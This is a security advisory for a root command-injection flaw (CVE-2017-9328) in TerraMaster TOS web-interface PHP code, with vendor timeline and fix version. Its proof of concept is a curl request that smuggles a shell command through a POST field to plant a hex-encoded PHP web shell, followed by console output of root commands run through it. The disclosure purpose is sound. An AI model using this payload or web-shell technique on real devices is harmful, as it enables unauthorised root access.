Skip to content

Instantly share code, notes, and snippets.

@hybriz
Last active September 13, 2018 08:05
Show Gist options
  • Save hybriz/63bbe2d963e531357aca353c74dd1ad5 to your computer and use it in GitHub Desktop.
Save hybriz/63bbe2d963e531357aca353c74dd1ad5 to your computer and use it in GitHub Desktop.
Shell Metacharacter Injection Vulnerability in TOS 2.x/3.x

Advisory Information

Title: TOS Remote Code Execution Vulnerability

Advisory URL: https://gist.github.com/hybriz/63bbe2d963e531357aca353c74dd1ad5

Date published: 2017-09-13

Date of last update: 2017-09-13

Vendor: TerraMaster

Disclosure scheme: 60-day deadline Responsible Disclosure

State: Fixed.

Vulnerability Information

Class: Improper Neutralization of Special Elements used in a Command [CWE-77]

Impact: Code execution as root

Remotely Exploitable: Yes

Locally Exploitable: Yes

CVE Name: CVE-2017-9328

Vulnerability Description

A shell metacharacter injection vulnerability was found in a PHP file that leads to remote code execution as root.

Vulnerable Packages

This vulnerability has been confirmed and exploited successfully in the following versions of TOS:

  • TOS <= 3.0.31
  • TOS <= 2.515
  • TOS <= 2.266

Vendor Information, Solutions and Workarounds

Vendor was contacted, vulnerability was reported and is now fixed in the beta release of TOS (3.0.34 onwards).

Possible mitigation involves disallowing network access to the web interface.

To fully correct this vulnerability one needs to upgrade to version 3.0.34 or higher.

Credits

Thanks to Simone Margaritelli (evilsocket) for pointing out the existence of this vendor and finding other vulnerabilities on TOS.

Technical Description / Proof of Concept Code

at the start of file "/usr/www/include/ajax/GetTest.php", one can see

<?php
include_once "../../include/app.php";
$data = $_POST;

$file = "/mnt/base/.".basename($data['dev'])."test";
if(!file_exists($file)) touch($file);
if(isset($data['testtype'])){//开始或者停止过程...
        if($data['testtype'] != 'stop'){
                $line = $data['dev'].':'.$data['testtype'].":".time();
                shell_exec("echo -e \"".$line."\" > $file");
        }
        $return = smartscan($data['dev'],$data['testtype']);

the input used in the shell_exec() function is obviously not filtered well enough and thus allows for inserting shell commands.

as demonstration, the following 2 commands will exploit and confirm the presence of the issue.

Exploit:

curl 'http://IP-ADDRESS-OF-NAS:8181/include/ajax/GetTest.php' -X POST --data 'dev=b1bebe&testtype=start;\"$(echo -en "\\x3c\\x3f\\x70\\x68\\x70\\x20\\x70\\x61\\x73\\x73\\x74\\x68\\x72\\x75\\x28\\x24\\x5f\\x52\\x45\\x51\\x55\\x45\\x53\\x54\\x5b\\x22\\x69\\x22\\x5d\\x29\\x3b\\x20\\x3f\\x3e\\n"  > xploited.php);'

this will generate a file called "xploited.php" which runs arbitrary commands, as one can see in the console output below.

$ curl 'http://192.168.100.100:8181/include/ajax/GetTest.php' -X POST --data 'dev=b1bebe&testtype=start;\"$(echo -en "\\x3c\\x3f\\x70\\x68\\x70\\x20\\x70\\x61\\x73\\x73\\x74\\x68\\x72\\x75\\x28\\x24\\x5f\\x52\\x45\\x51\\x55\\x45\\x53\\x54\\x5b\\x22\\x69\\x22\\x5d\\x29\\x3b\\x20\\x3f\\x3e\\n"  > xploited.php);'
<br />
<b>Fatal error</b>:  Call to undefined function smartscan() in <b>/mnt/base/www/include/ajax/GetTest.php</b> on line <b>12</b><br />
$ curl 'http://192.168.100.100:8181/include/ajax/xploited.php' -b 'i=ls -latr /mnt/base/www/include/ajax/xploited.php'
-rw-r--r-- 1 root root 35 Jun 20 16:29 /mnt/base/www/include/ajax/xploited.php
$ curl 'http://192.168.100.100:8181/include/ajax/xploited.php' -b 'i=id && uname -a && cat /proc/version'
uid=0(root) gid=0(root)
Linux Tnas-XXXXXX 2.6.31.8 #8 PREEMPT Sun Mar 16 16:51:41 CST 2014 armv5tel GNU/Linux
Linux version 2.6.31.8 (root@rds-02) (gcc version 4.3.2 (sdk3.2rc1-ct-ng-1.4.1) ) #8 PREEMPT Sun Mar 16 16:51:41 CST 2014
$

Report Timeline

2017-06-20: Shared this advisory with vendor via provided support email

2017-06-22: Vulnerability acknowledged and information relayed to engineers

2017-09-07: Sent e-mail asking for news

2017-09-07: Beta version updated with fix (beta 3.0.34)

2017-09-08: Vendor replied with link to patched version

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment